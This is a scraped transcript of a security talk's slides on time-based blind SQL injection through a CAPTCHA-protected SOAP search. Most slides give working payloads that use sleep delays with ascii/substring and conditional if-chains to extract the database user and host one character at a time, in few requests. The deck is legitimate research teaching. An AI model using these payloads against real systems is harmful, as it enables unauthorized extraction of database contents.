Time based CAPTCHA protected SQL injection through SOAP-webservice
-
Upload
frans-rosen -
Category
Technology
-
view
1.620 -
download
1
Transcript of Time based CAPTCHA protected SQL injection through SOAP-webservice
![Page 1: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/1.jpg)
detectifyTime based captcha protected SQL injection through SOAP-webservice
Frans Rosén @fransrosen
![Page 2: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/2.jpg)
detectify
Search + CAPTCHA
![Page 3: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/3.jpg)
detectify
Search for Bobby: '
![Page 4: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/4.jpg)
detectify
Search: '-sleep(5)-'
![Page 5: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/5.jpg)
detectify
CAPTCHA…
https://twitter.com/offensive_image/status/751191306500734976
![Page 6: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/6.jpg)
detectify
Me need
1. DoaclearPoC–getdata2. Asfewrequestsaspossible3. FindALLthestorefronts!4. ???5. PROFIT!!!
![Page 7: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/7.jpg)
detectify
user()
'-sleep((ascii(substring(user(),1,1))-90)/2)-'
![Page 8: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/8.jpg)
detectify
user()
'-sleep((ascii(substring(user(),1,1))-90)/2)-'
(14*2)+90=118==v
![Page 9: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/9.jpg)
detectify
Validate
'-(if(ascii(substring(user(),1,1))=117,sleep(3),1))-(if(ascii(substring(user(),1,1))=118,sleep(6),1))-(if(ascii(substring(user(),1,1))=119,sleep(9),1))-'
===v
![Page 10: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/10.jpg)
detectify
Down on the @
'-sleep((ascii(substring(user(),21,1))-90)/2)-'
![Page 11: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/11.jpg)
detectify
Host search
'-sleep((ascii(substring(user(),21,1))-46)*2)-'
![Page 12: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/12.jpg)
detectify
Host search
0sforadot(T-4)/2 =2'-sleep((ascii(substring(user(),21,1))-46)*2)-'
![Page 13: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/13.jpg)
detectify
Setup
![Page 15: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/15.jpg)
detectify
Result
![Page 16: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/16.jpg)
detectify
Other
https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf
SQLInjectionOptimizationandObfuscationTechniques
![Page 17: Time based CAPTCHA protected SQL injection through SOAP-webservice](https://reader031.fdocuments.us/reader031/viewer/2022022409/587aa7ed1a28abed218b4d73/html5/thumbnails/17.jpg)
detectifyThanks!
Frans Rosén (@fransrosen) – www.detectify.com